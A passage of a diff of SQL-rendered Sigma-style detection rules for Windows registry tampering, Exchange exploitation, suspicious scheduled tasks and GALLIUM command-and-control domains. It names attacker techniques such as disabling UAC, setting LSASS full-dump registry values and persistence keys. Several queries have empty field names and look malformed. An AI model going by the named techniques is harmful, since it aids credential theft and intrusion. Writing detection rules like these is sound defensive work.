'%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' 
OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE 
'%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' 
ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE 
'%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Set-OabVirtualDirectory' AND = 'ExternalUrl' AND LIKE 'Page\\_Load' ESCAPE '\\' AND = 'script')" ], - "filename": "registry_set_chrome_extension.yml" + "filename": "win_exchange_set_oabvirtualdirectory_externalurl.yml" }, { - "title": "Disable UAC Using Registry", - "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", + "title": "Failed MSExchange Transport Agent Installation", + "id": "c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa", "status": "experimental", - "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", - "author": "frack113", + "description": "Detects a failed installation of a Exchange Transport Agent", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1548.002" + "attack.persistence", + "attack.t1505.002" ], "falsepositives": [ - "Unknown" + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." 
], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID = '6' AND Data LIKE '%Install-TransportAgent%' ESCAPE '\\')" ], - "filename": "registry_set_disable_uac_registry.yml" + "filename": "win_exchange_transportagent_failed.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", - "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", + "title": "Possible Exploitation of Exchange RCE CVE-2021-42321", + "id": "c92f1896-d1d2-43c3-92d5-7a5b35c217bb", "status": "experimental", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects log entries that appear in exploitation attempts against MS Exchange RCE CVE-2021-42321", + "author": "Florian Roth (Nextron Systems), @testanull", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.lateral_movement", + "attack.t1210" ], "falsepositives": [ - "Unknown" + "Unknown, please report false positives via https://github.com/SigmaHQ/sigma/issues" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND EventID IN ('6', '8') AND (Data LIKE '%Cmdlet failed. 
Cmdlet Get-App, %' ESCAPE '\\' OR Data LIKE '%Task Get-App throwing unhandled exception: System.InvalidCastException:%' ESCAPE '\\'))" ], - "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "win_exchange_cve_2021_42321.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", - "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", + "title": "Remove Exported Mailbox from Exchange Webserver", + "id": "09570ae5-889e-43ea-aac0-0e1221fb3d95", "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "description": "Detects removal of an exported Exchange mailbox which could be to cover tracks from ProxyShell exploit", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1070" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND NewValue LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'MSExchange Management' AND = 'Remove-MailboxExportRequest' AND = ' -Identity ' AND = ' -Confirm \"False\"')" ], - "filename": "registry_set_uac_bypass_winsat.yml" + "filename": "win_exchange_proxyshell_remove_mailbox_export.yml" }, { - "title": "Potential Persistence Via AutodialDLL", - "id": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "title": "Suspicious Application Installed", + "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", "status": "experimental", - "description": "Detects change the the \"AutodialDLL\" key which could be used as a 
persistence method to load custom DLL via the \"ws2_32\" library", + "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution" ], "falsepositives": [ - "Unlikely" + "Packages or applications being legitimately used by users or administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "win_shell_core_susp_packages_installed.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Scheduled Task Executed Uncommon LOLBIN", + "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "False positives may 
occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" }, { - "title": "Potential PendingFileRenameOperations Tamper", - "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", + "title": "Scheduled Task Executed From A Suspicious Location", + "id": "424273ea-7cf8-43a6-b712-375f925e481f", "status": "experimental", - "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", - "author": "frack113", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "author": "Nasreddine 
Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Installers and updaters may set currently in use files for rename after a reboot." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_susp_pendingfilerenameoperations.yml" + "filename": "win_taskscheduler_execution_from_susp_locations.yml" }, { - "title": "Register New IFiltre For Persistence", - "id": "b23818c7-e575-4d13-8012-332075ec0a2b", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "status": "experimental", - "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. 
You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate registration of IFilters by the OS or software" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' 
ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 
'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_ifilter.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". 
Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "status": "test", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Potential Persistence Via Event Viewer Events.asp", - "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", - "status": "test", - "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1112" + "title": "New Firewall Rule Added In Windows Firewall Exception List", + "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + 
